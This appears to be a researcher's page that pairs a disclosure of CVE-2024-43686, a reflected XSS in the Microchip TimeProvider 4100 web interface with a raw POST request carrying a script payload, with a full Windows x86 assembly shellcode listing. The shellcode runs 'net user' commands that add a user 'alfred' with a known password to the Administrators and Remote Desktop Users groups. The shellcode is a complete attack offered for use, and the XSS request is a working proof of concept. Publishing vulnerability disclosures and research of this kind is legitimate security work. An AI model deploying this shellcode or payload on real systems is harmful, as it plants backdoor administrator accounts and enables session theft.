CVE-2024-43686 - MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - REFLECTED CROSS-SITE SCRIPTING XSS

Coming across the administrative interface of the “Microchip TimeProvider® 4100 Grandmaster TP4100” device. 

TimeProvider 4100 Grandmaster Device

There was a particular parameter channelId that resulted in reflecting its content in the embedded web server responses. Specifically, the request that deals with updating the charts.

Going forward in this way, after several attempts, it was possible to inject a JavaScript payload between <scripts> tags, resulting in a Reflected Cross-site Scripting Vulnerability. The following image shows an example of a request containing the malicious JavaScript payload:

Request RAW:

POST /get_chart_data HTTP/1.1

Host: XXX.XXX.XXX.XXX

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 99

Origin: https://XXX.XXX.XXX.XXX

Referer: https://XXX.XXX.XXX.XXX/perfmon_t1e1_stat

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

Te: trailers

Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=span&channelId=1%3cscript%3ealert(1)%3c%2fscript%3easd

Payload execution on the victim’s browser:

Conclusion:

An unauthenticated user can insert JavaScript snippets in channelId parameter on the specified POST request to the web resource get_chart_data. In the worst case, attackers will be able to perform privileged operations by stealing administrative user’s session or gain access to sensitive information belonging to the user.  

Reporting Information:

CVE Identifier: CVE-2024-43686

CVSS Score: 8.0
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43686
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-reflected-xss-vulnerability
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Shellcode - Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group (240 bytes)

  

Author: Armando Huesca Prida

Summary: 

Windows x86 Shellcode that uses CreateProcessA Windows API to add a new user to administrators and remote desktop users group. This shellcode uses JMP/CALL/POP technique and static kernel32.dll functions addresses.

It's possible to bypass bad-chars by switching the message db string between uppercase and lowercase letters.

Exploitdb publication: shellcode

Shellcode informations:

# Exploit Title: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 20-02-2021
#
# Tested on:
# Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)

Shellcode considerations:

- Function address of CreateProcessA in kernel32.dll: 0x77082082
- Function address of ExitProcess in kernel32.dll: 0x770d214f
- Administartor user credentials: alfred:test
- Size of message db parameter, 152 bytes -> 0x98 hex = 0x111111A9 - 0x11111111 (0x00 badchar avoidance) ;)

Assembly shellcode:

global _start
section .text

_start:

jmp application

firststep:
pop edi
xor eax, eax
mov esi, 0x111111A9
sub esi, 0x11111111
mov [edi+esi], al                       ; size of message db parameter

StartUpInfoANDProcessInformation:
push eax                                ; hStderror null in this case
push eax                                ; hStdOutput, null
push eax                                ; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12                            ; 18 times loop to fill both structures.

looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101            ; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44; cb=3D0x44
lea eax, [esp+0x10]                     ; eax points to StartUpInfo

        ; eax holds a pointer to StartUPinfo
        ; esp holds a pointer to Process_Info filled of null values

createprocessA:
push esp                                ; pointer to Process-Info
push eax                                ; pointer to StartUpInfo
xor ebx, ebx
push ebx                                ; null
push ebx                                ; null
push ebx                                ; null
inc ebx
push ebx                                ; bInheritHandles=3Dtrue
dec ebx
push ebx                                ; null
push ebx                                ; null
push edi                                ; pointer to message db string

push ebx                                ; null
mov edx, 0x77082082                     ; CreateProcessA addr in kernel32.dll
call edx

ExitProcess:

push eax                                ; createprocessA return in eax
mov edx, 0x770d214f                     ; ExitProcess addr in kernel32.dll
call edx

application:
call firststep
message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add'